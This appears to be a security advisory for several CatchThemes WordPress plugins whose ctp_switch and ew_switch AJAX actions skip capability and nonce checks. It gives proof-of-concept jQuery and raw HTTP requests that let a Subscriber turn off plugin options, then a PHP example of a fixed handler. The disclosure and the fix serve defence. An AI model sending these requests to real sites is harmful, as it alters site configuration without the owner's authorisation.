Multiple plugins from the CatchThemes vendor do not perform capability and CSRF (nonce) checks in the ctp_switch AJAX action, which could allow any authenticated user, such as a Subscriber, to change the plugin's configuration.
PoC
1) Turn off "Turn On Catch Themes & Catch Plugin tabs"

   jQuery.post(ajaxurl, { action: "ctp_switch", option_name: "theme_plugin_tabs", value: "false" })

   POST /wp-admin/admin-ajax.php HTTP/1.1
   Accept: */*
   Accept-Language: en-GB,en;q=0.5
   Accept-Encoding: gzip, deflate
   Content-Type: application/x-www-form-urlencoded; charset=UTF-8
   X-Requested-With: XMLHttpRequest
   Content-Length: 59
   Connection: close
   Cookie: [subscriber+]

   action=ctp_switch&option_name=theme_plugin_tabs&value=false

2) Turn off "EW: Authors"

   jQuery.post(ajaxurl, { action: "ew_switch", option_name: "ew_authors", value: "false" })

   POST /wp-admin/admin-ajax.php HTTP/1.1
   Accept: */*
   Accept-Language: en-GB,en;q=0.5
   Accept-Encoding: gzip, deflate
   Content-Type: application/x-www-form-urlencoded; charset=UTF-8
   X-Requested-With: XMLHttpRequest
   Content-Length: 59
   Connection: close
   Cookie: [subscriber+]

   action=ew_switch&option_name=ew_authors&value=false
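The two checks the advisory says are missing (a nonce check against CSRF and a capability check) shown in an illustrative WordPress AJAX option-toggle handler. This is an added example, not the vendor's code; the function, hook and option names (example_*, ctp_switch_nonce) are assumptions.

```php
<?php
// Illustrative hardened handler for an option-toggle AJAX action (added example,
// not the vendor's code). Function, nonce and option-prefix names are assumed.

// Register for logged-in users only (wp_ajax_ prefix, not wp_ajax_nopriv_).
add_action( 'wp_ajax_ctp_switch', 'example_ctp_switch_handler' );

function example_ctp_switch_handler() {
    // 1. CSRF: require a nonce tied to this action. check_ajax_referer() terminates
    //    the request with "-1" when the nonce is missing or invalid.
    check_ajax_referer( 'ctp_switch_nonce', 'nonce' );

    // 2. Authorization: only users who may manage options can change plugin settings.
    //    Without this check every logged-in role, Subscriber included, reaches update_option().
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    // 3. Input validation: allow-list the option the client may toggle instead of
    //    letting it name an arbitrary option, and coerce the value to a boolean.
    $allowed     = array( 'theme_plugin_tabs', 'ew_authors' );
    $option_name = isset( $_POST['option_name'] ) ? sanitize_key( wp_unslash( $_POST['option_name'] ) ) : '';
    if ( ! in_array( $option_name, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'Unknown option' ), 400 );
    }
    $value = isset( $_POST['value'] ) && 'true' === $_POST['value'];

    update_option( 'example_' . $option_name, $value );
    wp_send_json_success( array( 'option' => $option_name, 'value' => $value ) );
}

// The nonce is minted server-side and handed to the admin script, so the
// jQuery.post() call must carry it; a page on another origin cannot forge it.
add_action( 'admin_enqueue_scripts', function () {
    wp_enqueue_script( 'example-ctp', plugins_url( 'ctp.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'example-ctp', 'exampleCtp', array(
        'ajaxurl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'ctp_switch_nonce' ),
    ) );
} );
// In ctp.js the request becomes:
// jQuery.post( exampleCtp.ajaxurl, { action: 'ctp_switch', nonce: exampleCtp.nonce,
//                                    option_name: 'theme_plugin_tabs', value: 'false' } );
```

With these checks in place, the requests in the PoC above fail the nonce check before any option is touched, and a valid nonce from a Subscriber session still fails the capability check.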